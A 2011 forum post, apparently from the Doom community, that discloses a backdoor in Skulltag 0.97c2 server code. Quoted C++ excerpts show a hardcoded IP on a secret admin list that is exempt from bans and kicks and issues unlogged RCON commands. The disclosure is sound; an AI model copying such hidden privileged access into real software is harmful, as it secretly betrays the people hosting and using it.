mandax
Warming Up
Posts: 13
Registered: 02-11 |
Firstly - I'm a long time Skulltag player, I love ST and I want to continue to play it, therefore I would like to remain anonymous.
Consider this post an act of whistleblowing that will hopefully help improve the port in the end.
Some of you might remember the csDoom backdoor incident. The creator of csDoom (Fly) added a backdoor to the server binaries which would grant him RCON rights on any server.
A similar backdoor was implemented by Carnevil as can be seen in the recently released 0.97c2 source code.
sv_admin.cpp:
Here we can see Carnevils hardcoded IP address and a function that will return true, if a given address is included in the Adminlist! Note that this code was written with expandability in mind.
code:
void SERVER_ADMIN_Construct( void )
{
g_AdminList[ADMIN_CARNEVIL].Address.ip[0] = 24;
g_AdminList[ADMIN_CARNEVIL].Address.ip[1] = 242;
g_AdminList[ADMIN_CARNEVIL].Address.ip[2] = 214;
g_AdminList[ADMIN_CARNEVIL].Address.ip[3] = 13;
}
bool SERVER_ADMIN_IsAdministrator( netadr_t Address )
{
ULONG ulIdx;
for ( ulIdx = 0; ulIdx < NUM_ADMINS; ulIdx++ )
{
if ( NETWORK_CompareAddress( g_AdminList[ulIdx].Address, Address, true ))
return ( true );
}
return ( false );
}
Let us have a look where this function is used and what IP addresses listed in the secret Adminlist can do:
all of the following code is from sv_main.cpp:
They cannot be banned from the server!
code:
if (( sv_enforcebans ) && ( SERVERBAN_IsIPBanned( szAddress[0], szAddress[1], szAddress[2], szAddress[3] ))
&& ( SERVER_ADMIN_IsAdministrator( clients[lClient].address ) == false ))
{
// Client has been banned! GET THE FUCK OUT OF HERE!
SERVER_ClientError( lClient, NETWORK_ERRORCODE_BANNED );
return;
}
They can issue "silent" RCON commands that will not be printed.
code:
// If they don't have RCON access, and aren't an adminstrator, deny them the ability to do this.
if (( clients[parse_cl].bRCONAccess == false ) && ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false ))
return ( false );
// Admins can operate incognito.
if ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false )
Printf( "%s RCON (%s)\n", players[parse_cl].userinfo.netname, pszCommand );
They cannot be kicked from the game or server!
code:
if ( stricmp( szPlayerName, argv[1] ) == 0 )
{
if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
continue;
// If we provided a reason, give it.
if ( argv.argc( ) >= 3 )
SERVER_KickPlayer( ulIdx, argv[2] );
else
SERVER_KickPlayer( ulIdx, "None given." );
return;
}
code:
if ( stricmp( szPlayerName, argv[1] ) == 0 )
{
if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address ))
continue;
// Already a spectator!
if ( PLAYER_IsTrueSpectator( &players[parse_cl] ))
continue;
// If we provided a reason, give it.
if ( argv.argc( ) >= 3 )
SERVER_KickPlayerFromGame( ulIdx, argv[2] );
else
SERVER_KickPlayerFromGame( ulIdx, "None given" );
return;
}
All of the above probably applies to ScoreDoomST, which is based on 0.97c2, as well.
Now this backdoor might or might not be present in the current ST source code.
What caught my eye though in the recent changelog was the implementation of a server-side whitelist and adminlist, with similar functionality, meant for server hosts only. For more details check out the Wiki.
The Skulltag master-server is distributing a global banlist to all servers. As this and this post suggest a global whitelist is distributed as well.
Now what if all the server-side lists have been implemented at the global level and the master-server is also distributing a secret adminlist to all servers (maybe the global adminlist IP checks are done directly on the master though)?
If a backdoor of any kind is still present it would be a huge security risk and massive breach of trust between server hosts and the ST administration.
Someone who is skilled in Reverse Engineering might want to check the current server master communication for a 'third list' or other suspicious queries to confirm my worries.
An official statement from the administration confirming or disputing the existence of a "master adminlist" or any other form of backdoor could clear things up.
Since Skulltag is closed source we ultimately have to trust the official statement from the administration.
Releasing older source code so we can at least see since when the backdoor was present would be a first step.
I guess this incident will make the administration cautious to remove incriminating code from future source code releases though. Some viable options to regain trust would be to go fully open source or allow some neutral members from the DooM community to review the code in person by visiting one of the developers IRL.
I know that some prominent figures from the doom community, like AlexMax, Ladna, Gez and Graf Zahl, are actively pushing for Skulltag to be open sourced.
Ladna said it best in the previously linked altdeath thread:
ST keeping a current, open-source version would at least prevent something like the current situation with ZDaemon by allowing us the "fuck you jerks" option.
He is absolutely right! The players should have all the power. The programmers should just do their job and write code instead. If the programmers or admins try to deceive the players the project can be forked easily!
I would be very pleased if ST became a truly free port like Odamex and they could finally share code and join forces!
Maybe this negative incident here can be turned into something positive and accelerate that process.
|
02-13-11 23:22 
